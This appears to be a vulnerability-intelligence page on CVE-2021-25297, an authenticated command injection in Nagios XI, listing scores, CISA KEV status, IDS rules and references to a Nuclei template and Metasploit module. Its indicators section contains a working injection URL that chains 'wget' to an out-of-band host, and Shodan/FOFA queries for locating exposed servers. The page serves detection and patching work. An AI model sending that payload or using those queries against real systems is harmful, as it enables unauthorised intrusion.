CVE-2021-25297
published 2021-02-15CVE-2021-25297: Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file…
PriorityP189high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-02-01
Exploited in the wild
EPSS
42.94%
98.6th percentile
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | 5.5.6 – 5.7.5 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on
path/nagiosxi/config/monitoringwizard.php
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →Exploit traffic is a GET request to /nagiosxi/config/monitoringwizard.php with the 'ip_address' parameter containing a URL-encoded semicolon (%3b / 0x3b) used to inject OS commands after the IP address value.
- →The Nuclei template confirms exploitation by checking for an out-of-band DNS interaction (interactsh) AND the presence of 'Ping' and 'Switch Details' in the HTTP response body, with a 200 status code.
- →The wizard parameter is set to 'switch' and nextstep=3 in the injection request; defenders should alert on these specific query-string values combined with shell metacharacters in ip_address.
- →Shodan/FOFA queries can be used to identify exposed Nagios XI instances as potential targets: title:"Nagios XI", http.title:"nagios xi", title="nagios xi", app="nagios-xi".
- →Successful exploitation results in command execution as the 'apache' user on the Nagios XI server. ↗
- ·The vulnerability affects Nagios XI versions 5.5.6 through 5.7.5 only; versions outside this range are not affected by this specific injection path.
- ·Exploitation requires valid Nagios XI credentials; this is an authenticated vulnerability, not unauthenticated. ↗
- ·The Metasploit module also covers CVE-2021-25296 (windowswmi wizard) and CVE-2021-25298 (cloud-vm wizard) via the same module; the Snort rule SID 2034993 covers both CVE-2021-25297 and CVE-2021-25298 together. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5924-w244-8fxp: Nagios XI version xi-5
ghsa_unreviewed·2022-05-24
CVE-2021-25297 [HIGH] CWE-78 GHSA-5924-w244-8fxp: Nagios XI version xi-5
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
VulnCheck
Nagios XI OS Command Injection
vulncheck·2021·CVSS 8.8
CVE-2021-25297 [HIGH] CWE-78 Nagios XI OS Command Injection
Nagios XI OS Command Injection
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Affected: Nagios Nagios XI
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-02-01
CISA
Nagios XI OS Command Injection
cisa·2022-01-18·CVSS 8.8
CVE-2021-25297 [HIGH] CWE-78 Nagios XI OS Command Injection
Vulnerability: Nagios XI OS Command Injection
Affected: Nagios Nagios XI
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-25297
Remediation Due Date: 2022-02-01
Suricata
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
suricata·2025-01-09·CVSS 6.1
CVE-2021-25299 [MEDIUM] ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/nagiosxi/admin/sshterm.php?"; startswith; fast_pattern; content:"url="; nocase; pcre:"/^.+(script|onerror|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ri"; reference:url,www.connectwise.com/resources/cve-spotlight-nagios-xi-cve-2021-25296-25297-25298-25299; reference:cve,2021-25299; classtype:web-application-attack; sid:2059094; rev:2; metadata:affected_product
Suricata
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
suricata·2022-01-27·CVSS 8.8
CVE-2021-25296 [HIGH] ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Nuclei
Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
nuclei·CVSS 8.8
CVE-2021-25297 [HIGH] Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2021-25297
info:
name: Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection
author: k0pak4
severity: high
description: |
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is im
Metasploit
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
metasploit·CVSS 8.8
CVE-2021-25296 [HIGH] Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of each attack.
## Network Attack Trends February-April 2021: Analysis of the Latest Published Vulnerabilities
From February-April 2021, a total of 4,969 new Common Vulnerabilities and Exposures (CVE) numbers were registered. To better und
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: February-April 2021
Yue Guan
Lei Xu
Vaibhav Singhal
Brock Mammen
Published: July 1, 2021
Trend Reports
Vulnerabilities
Network security trends
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls . We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of
http://nagios.comhttp://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttps://assets.nagios.com/downloads/nagiosxi/versions.phphttps://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.mdhttps://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-andhttp://nagios.comhttp://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.htmlhttps://assets.nagios.com/downloads/nagiosxi/versions.phphttps://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.mdhttps://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-andhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-25297
2021-02-15
Published
2022-01-18
Added to CISA KEV
Exploited in the wild